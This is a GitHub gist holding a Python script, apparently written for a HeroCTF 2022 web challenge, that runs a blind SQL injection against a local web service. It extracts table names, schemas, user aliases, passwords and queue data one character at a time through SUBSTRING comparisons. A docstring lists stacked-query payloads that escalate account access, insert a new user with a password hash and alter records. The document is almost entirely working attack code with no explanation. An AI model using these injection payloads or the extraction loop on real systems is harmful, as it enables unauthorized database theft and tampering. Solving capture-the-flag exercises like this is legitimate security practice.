Skip to content

Instantly share code, notes, and snippets.

@xl00t

xl00t/HerVIP1.py

Created May 29, 2022 21:10
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
HerVIP1.py
Raw
HerVIP1.py
#!/usr/bin/env python3
import requests
import string
import time
import sys
import random
import string
'''
table :
- users :
- CREATE TABLE users(alias varchar(100) primary key, password varchar(1000), canAccessForm int DEFAULT 0)
- queue :
- CREATE TABLE queue(uuid varchar(200) primary key, origin varchar(1000), associateUser varchar(100), lastUpdate DATE, p3rc3nt4g30fus3r varchar(1000), numberOfRequest varchar(1000))
'; UPDATE users SET canAccessForm = 1 WHERE alias = "aa"--
'; UPDATE queue SET p3rc3nt4g30fus3r="100", numberOfRequest="100"--
'; INSERT INTO users (alias, password, canAccessForm) VALUES ("bb", "lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY=", 1)--
'; INSERT INTO queue (uuid, origin, associateUser, lastUpdate, p3rc3nt4g30fus3r, numberOfRequest) VALUES ("2f1395a1-b89b-4d48-93a8-a4e18ac48471", "chall.heroctf.fr", "aa", DATETIME('now'), "1000", "1000")--
3f1395a1-b89b-4d48-93a8-a4e18ac48471 chall.heroctf.fr aa Sun May 29 2022 09:20:24 GMT+0000 (Coordinated Universal Time) 01 0##
aa lhtt0+3jy47LqsvWjeBAzXjrLtWIkTDM60xJJo6k1QY= 0
update/1', p3rc3nt4g30fus3r='1000'--
'''
charset = ' '+string.printable
url = "http://localhost:8081/?id=update/"
def trychar(char, offset):
#requests.get(f"{url}foo' or SUBSTR((SELECT 'ceciestunflagimaginaire'),{offset},1)='{char}'---") # POC
#requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),{offset},1)='{char}'--")# tables
#requests.get(f"{url}foo' or SUBSTRING((SELECT GROUP_CONCAT(sql) FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='queue'),{offset},1)='{char}'--")# columns
#requests.get(f"{url}foo' or SUBSTRING((SELECT alias ||' '|| canAccessForm ||' '|| password FROM users limit 1 offset 1),{offset},1)='{char}'--")
requests.get(f"{url}aaa' or SUBSTRING((SELECT associateUser ||' '|| p3rc3nt4g30fus3r ||' '|| numberOfRequest ||' '|| lastUpdate FROM queue limit 1 offset 0),{offset},1)='{char}'--")
r = requests.get(f"{url}111").text
if '"numberOfRequest":"0"' in r:
return 0
return 1
def main():
offset = 1
password = ""
while True:
found = False
for c in charset:
if trychar(c, offset)==1:
password += c
print(password)
offset += 1
found = True
break
if found == False:
break
print()
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment